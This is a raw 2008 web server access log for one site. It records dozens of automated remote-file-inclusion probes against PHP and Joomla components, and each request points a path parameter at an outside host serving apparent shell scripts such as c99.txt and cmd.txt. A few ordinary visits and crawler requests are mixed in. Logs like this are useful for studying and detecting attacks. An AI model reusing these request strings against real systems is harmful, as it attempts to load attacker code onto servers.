88.208.217.32 - - [28/May/2008:10:14:41 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.mhstore.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
75.0.18.81 - - [28/May/2008:10:15:22 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.mhstore.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
75.0.18.81 - - [28/May/2008:10:15:22 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.mhstore.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:10:15:29 -0700] "GET /logs/access_080106.log/admin.php?include_path=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:10:15:30 -0700] "GET /admin.php?include_path=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:10:15:30 -0700] "GET /logs/admin.php?include_path=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:10:15:41 -0700] "GET /logs/access_080117.log/admin.php?include_path=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
88.232.107.38 - - [28/May/2008:10:15:47 -0700] "GET http://www.dmulk.com/login.php?dir=http://www.turkishdefacerteam.by.ru/c99.txt? HTTP/1.0" 404 275 "-" "-" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:10:15:59 -0700] "GET /logs/access_080118.log//init_basic.php?GALLERY_BASEDIR=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
88.232.107.38 - - [28/May/2008:10:16:26 -0700] "GET http://www.dmulk.com/login.php?dir=http://www.turkishdefacerteam.by.ru/c99.txt? HTTP/1.0" 404 275 "-" "-" "www.dmulk.com"
67.19.160.58 - - [28/May/2008:10:17:26 -0700] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.dmulk.com"
200.62.55.115 - - [28/May/2008:10:17:32 -0700] "GET /logs/components/com_extcalendar/errors.php?error=http://www.bestpaket.ru/netcat//dump/nid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.62.55.115 - - [28/May/2008:10:17:33 -0700] "GET /components/com_extcalendar/errors.php?error=http://www.bestpaket.ru/netcat//dump/nid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.132.117.185 - - [28/May/2008:10:17:49 -0700] "GET /bikes/CreSTOC07/ HTTP/1.1" 200 15296 "http://www.st-owners.com/forums/showthread.php?t=28172" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9b5) Gecko/2008032620 Firefox/3.0b5" "www.dmulk.com"
209.132.117.185 - - [28/May/2008:10:17:49 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9b5) Gecko/2008032620 Firefox/3.0b5" "www.dmulk.com"
209.132.117.185 - - [28/May/2008:10:17:53 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9b5) Gecko/2008032620 Firefox/3.0b5" "www.dmulk.com"
209.132.117.185 - - [28/May/2008:10:17:56 -0700] "GET /bikes/CreSTOC07/CreSTOC2007012.jpg HTTP/1.1" 200 3192023 "http://www.dmulk.com/bikes/CreSTOC07/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9b5) Gecko/2008032620 Firefox/3.0b5" "www.dmulk.com"
216.167.156.20 - - [28/May/2008:10:18:09 -0700] "GET /logs/access_071225.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.167.156.20 - - [28/May/2008:10:18:09 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.53.68.226 - - [28/May/2008:10:19:53 -0700] "GET /logs/access_080327.log/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:10:20:02 -0700] "GET /logs/access_080106.log/admin.php?include_path=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:10:20:03 -0700] "GET /admin.php?include_path=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:10:20:03 -0700] "GET /logs/admin.php?include_path=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:10:20:06 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:10:20:06 -0700] "GET //ashnews.php?pathtoashnews=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:10:20:20 -0700] "GET /logs/access_080117.log/admin.php?include_path=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:10:20:39 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:10:20:39 -0700] "GET //ashnews.php?pathtoashnews=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:10:20:39 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.200.229.181 - - [28/May/2008:10:20:40 -0700] "GET /logs/errors.php?error=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.200.229.181 - - [28/May/2008:10:20:40 -0700] "GET /errors.php?error=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
195.12.53.176 - - [28/May/2008:10:20:43 -0700] "GET /logs/access_080228.log//modules/TotalCalendar/about.php?inc_dir=http://www.geocities.com/mahesaputra53/kiss.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [28/May/2008:10:20:43 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.geocities.com/mahesaputra53/kiss.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [28/May/2008:10:20:44 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.geocities.com/mahesaputra53/kiss.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:10:20:47 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.jjkosta.org/kbs/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:10:20:47 -0700] "GET /logs/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.jjkosta.org/kbs/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
195.12.53.176 - - [28/May/2008:10:21:52 -0700] "GET /logs/access_080215.log//modules/TotalCalendar/about.php?inc_dir=http://www.geocities.com/mahesaputra53/kiss.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:10:22:06 -0700] "GET /logs/access_080327.log/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:10:22:06 -0700] "GET /logs/access_080327.log/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:10:22:07 -0700] "GET /logs/access_080327.log/claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.148.252.24 - - [28/May/2008:10:22:12 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://maxbidder.com/uploaded/508/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.148.252.24 - - [28/May/2008:10:22:12 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://maxbidder.com/uploaded/508/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.37.180 - - [28/May/2008:10:22:23 -0700] "GET /logs/access_071225.log HTTP/1.0" 200 195051 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:10:22:39 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:10:22:40 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:10:22:40 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.69.192.170 - - [28/May/2008:10:22:47 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://linknetcrew.com/source/robo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
208.69.192.170 - - [28/May/2008:10:22:47 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://linknetcrew.com/source/robo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:10:23:02 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:10:23:03 -0700] "GET /logs/access.log/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:10:23:03 -0700] "GET /component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:10:23:03 -0700] "GET /logs/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.167.156.20 - - [28/May/2008:10:23:08 -0700] "GET /logs//ashnews.php?pathtoashnews=http://a1a-live.com/cache/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.167.156.20 - - [28/May/2008:10:23:11 -0700] "GET //ashnews.php?pathtoashnews=http://a1a-live.com/cache/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.2.100.138 - - [28/May/2008:10:23:17 -0700] "GET /logs/access_071223.log/index.php?p=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [28/May/2008:10:23:21 -0700] "GET /index.php?p=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [28/May/2008:10:23:22 -0700] "GET /logs/index.php?p=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.67.192 - - [28/May/2008:10:23:40 -0700] "GET /logs/access_071230.log//tools/errors.php?error=http://www.kamablackbelt.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.192 - - [28/May/2008:10:23:41 -0700] "GET //tools/errors.php?error=http://www.kamablackbelt.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.192 - - [28/May/2008:10:23:41 -0700] "GET /logs//tools/errors.php?error=http://www.kamablackbelt.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.148.252.24 - - [28/May/2008:10:23:56 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.148.252.24 - - [28/May/2008:10:23:57 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.2.100.138 - - [28/May/2008:10:24:17 -0700] "GET /logs/access_080421.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.228.128.242 - - [28/May/2008:10:24:20 -0700] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/images.php?IMG_ROOT=http://www.gesangverein-eintracht.de//components/com_galleria/upload/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
67.228.128.242 - - [28/May/2008:10:24:20 -0700] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/images.php?IMG_ROOT=http://www.gesangverein-eintracht.de//components/com_galleria/upload/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
67.19.160.58 - - [28/May/2008:10:24:30 -0700] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:10:24:42 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:10:24:43 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:10:24:44 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.53.226 - - [28/May/2008:10:24:45 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.53.226 - - [28/May/2008:10:24:45 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.53.226 - - [28/May/2008:10:24:45 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:10:24:52 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:10:24:52 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:10:24:52 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:10:24:52 -0700] "GET //administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:10:24:53 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:10:24:53 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:10:25:02 -0700] "GET /logs/access_071218.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:10:25:02 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:10:25:02 -0700] "GET /logs/access_080212.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:10:25:02 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:10:25:04 -0700] "GET /logs/access_080212.log//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:10:25:12 -0700] "GET /logs/access_071224.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:10:25:25 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:10:25:34 -0700] "GET /logs/access_071218.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:10:25:34 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:10:25:35 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:10:25:37 -0700] "GET /logs/access.log/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:10:25:37 -0700] "GET /component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:10:25:38 -0700] "GET /logs/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:10:25:42 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:10:25:55 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:10:25:56 -0700] "GET //ashnews.php?pathtoashnews=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:10:25:56 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.146.133.138 - - [28/May/2008:10:26:01 -0700] "GET /logs/access_071225.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://kiliclub.com/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.146.133.138 - - [28/May/2008:10:26:01 -0700] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://kiliclub.com/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:10:26:01 -0700] "GET /logs/access_071224.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.146.133.138 - - [28/May/2008:10:26:01 -0700] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://kiliclub.com/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.193.201.57 - - [28/May/2008:10:26:16 -0700] "GET /logs/access_080401.log//classes/adodbt/sql.php?classes_dir=http://www.geocities.com/refusedlink/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
195.12.53.176 - - [28/May/2008:10:26:20 -0700] "GET /logs/access_080228.log//modules/TotalCalendar/about.php?inc_dir=http://www.geocities.com/mahesaputra53/kiss.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [28/May/2008:10:26:20 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.geocities.com/mahesaputra53/kiss.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [28/May/2008:10:26:20 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.geocities.com/mahesaputra53/kiss.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:10:26:33 -0700] "GET /logs/access.log//init_basic.php?GALLERY_BASEDIR=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:10:26:48 -0700] "GET /logs/access_080401.log//ashnews.php?pathtoashnews=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:10:26:51 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:10:26:51 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:10:26:51 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:10:26:58 -0700] "GET /logs/access_080212.log//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:10:26:59 -0700] "GET /errors.php?error=http://www.jjkosta.org/kbs/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
74.55.113.226 - - [28/May/2008:10:26:59 -0700] "GET /logs/errors.php?error=http://www.jjkosta.org/kbs/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
195.12.53.176 - - [28/May/2008:10:27:27 -0700] "GET /logs/access_080215.log//modules/TotalCalendar/about.php?inc_dir=http://www.geocities.com/mahesaputra53/kiss.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:10:28:38 -0700] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
